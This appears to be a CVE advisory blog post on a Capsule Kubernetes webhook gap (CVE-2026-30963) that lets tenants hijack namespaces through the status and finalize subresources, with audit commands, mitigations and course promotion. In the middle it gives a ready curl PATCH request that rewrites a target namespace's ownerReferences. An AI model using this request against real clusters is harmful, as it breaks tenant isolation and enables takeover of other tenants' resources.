Listen to this Post
Intro: How CVE-2026-30963 Works:
Capsule, a Kubernetes multi-tenancy framework, uses a validating webhook to block namespace hijacking via standard update/patch operations. However, Kubernetes provides two special subresource APIs—namespace/status and namespace/finalize—which can modify a namespace’s metadata, including its ownerReferences. Prior to version 0.13.0, Capsule’s ValidatingWebhookConfiguration lacked rules to intercept these subresources. This means any request sent to `/api/v1/namespaces/{namespace}/status` or `/api/v1/namespaces/{namespace}/finalize` bypasses the webhook’s validation. Consequently, a malicious tenant administrator who has RBAC permissions to patch these subresources can alter a namespace’s ownerReferences, effectively reassigning ownership of that namespace (e.g., from another tenant to their own). This allows the attacker to take control of namespaces they should not have access to, breaking the multi-tenancy isolation that Capsule is designed to enforce. The fix in version 0.13.0 adds `namespaces/status` and `namespace/finalize` to the `resources` list in the ValidatingWebhookConfiguration, ensuring that webhook logic is applied to all relevant API endpoints. Without this mitigation, any tenant with subresource patch permissions can perform namespace hijacking.
DailyCVE Form:
Platform: Kubernetes, Capsule
Version: 0.12.x and below
Vulnerability: Namespace hijacking
Severity: Low (CVSS 2.7/3.9)
date: 2026-06-01
Prediction: 2026-06-01
What Undercode Say:
Audit current ValidatingWebhookConfiguration for missing subresources
kubectl get validatingwebhookconfiguration capsule-validating-webhook -o json | jq '.webhooks[].rules[] | select(.resources[] | contains("namespaces"))'
Check for tenant permissions that enable the attack
kubectl describe clusterrolebinding | grep -B5 -A10 "namespace/status|namespace/finalize"
Simulate the attack by patching the status subresource
curl -k --cert attacker.crt --key attacker.key --request PATCH 'https://<API_SERVER>/api/v1/namespaces/target-namespace/status' \
--header 'Content-Type: application/json-patch+json' \
--data '[{"op":"replace","path":"/metadata/ownerReferences","value":[{"apiVersion":"capsule.clastix.io/v1beta2","kind":"Tenant","name":"attacker-tenant","uid":"<UID>"}]}]'
Exploit:
A tenant with `patch` permission on `namespaces/status` or `namespace/finalize` can issue a PATCH request to the vulnerable subresource, modifying the `ownerReferences` field to point to their own tenant. As the webhook does not inspect these subresources, the change is accepted, and the namespace is hijacked.
Protection:
- Upgrade Capsule to version 0.13.0 or later.
- If upgrade is not possible, manually patch the ValidatingWebhookConfiguration to include `namespaces/status` and `namespace/finalize` under the `resources` field.
- Restrict RBAC permissions for `namespace/status` and `namespace/finalize` to only trusted users.
Impact:
Successful exploitation allows a tenant administrator to take ownership of any namespace (including system namespaces) they have patch access to via subresources, breaking multi-tenancy isolation, enabling privilege escalation, and potentially leading to data leakage or cross-tenant resource access.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
